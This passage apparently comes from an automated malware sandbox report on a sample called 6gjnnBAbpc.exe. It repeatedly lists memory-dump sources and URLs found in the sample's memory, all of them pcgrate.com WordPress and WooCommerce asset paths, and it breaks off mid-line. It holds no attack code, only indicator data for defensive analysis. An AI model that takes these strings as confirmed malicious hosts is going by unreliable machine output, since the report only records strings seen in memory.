00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.439510924.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/woocommerce-deposits/assets/js/add-to-cart.js?ver=3.1.7
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.318995335.00000000051B0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.321407915.00000000069C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.433068945.00000000076D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.314408979.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.434994131.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.432769760.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.439510924.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/woocommerce-pdf-catalog/public/css/woocommerce-pdf-catalog
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.318995335.00000000051B0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.321407915.00000000069C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.433068945.00000000076D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.314408979.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.434994131.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.432769760.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.439510924.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/woocommerce/assets/js/frontend/add-to-cart.min.js?ver=5.5.
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.318995335.00000000051B0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.321407915.00000000069C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.433068945.00000000076D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.314408979.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.434994131.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.432769760.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.439510924.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/woocommerce/assets/js/frontend/cart-fragments.min.js?ver=5
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.318995335.00000000051B0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.321407915.00000000069C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.433068945.00000000076D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.314408979.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.434994131.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.432769760.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.439510924.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/woocommerce/assets/js/frontend/woocommerce.min.js?ver=5.5.
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.318995335.00000000051B0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.321407915.00000000069C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.433068945.00000000076D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.314408979.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.434994131.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.432769760.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.439510924.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/woocommerce/assets/js/jquery-blockui/jquery.blockUI.min.js
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.318995335.00000000051B0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.321407915.00000000069C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.433068945.00000000076D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.314408979.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.434994131.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.432769760.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.439510924.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/woocommerce/assets/js/jquery-ui-touch-punch/jquery-ui-touc
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.318995335.00000000051B0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.321407915.00000000069C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.433068945.00000000076D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.314408979.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.434994131.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.432769760.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.439510924.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/woocommerce/assets/js/js-cookie/js.cookie.min.js?ver=2.1.4
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.318995335.00000000051B0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.321407915.00000000069C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.433068945.00000000076D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.314408979.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.434994131.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.432769760.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.439510924.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/style.css?ve
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.318995335.00000000051B0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.321407915.00000000069C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.433068945.00000000076D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.314408979.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.434994131.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.432769760.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.439510924.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/vendors-styl
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.318995335.00000000051B0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.321407915.00000000069C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.433068945.00000000076D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.314408979.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.434994131.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.432769760.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.439510924.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/themes/dt-the7/css/compatibility/elementor/elementor-global.min.cs
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.318995335.00000000051B0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.321407915.00000000069C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.433068945.00000000076D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.314408979.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.434994131.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.432769760.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.439510924.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/themes/dt-the7/css/main.min.css?ver=9.12.0
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.318995335.00000000051B0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.321407915.00000000069C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.433068945.00000000076D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.314408979.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.434994131.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.432769760.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 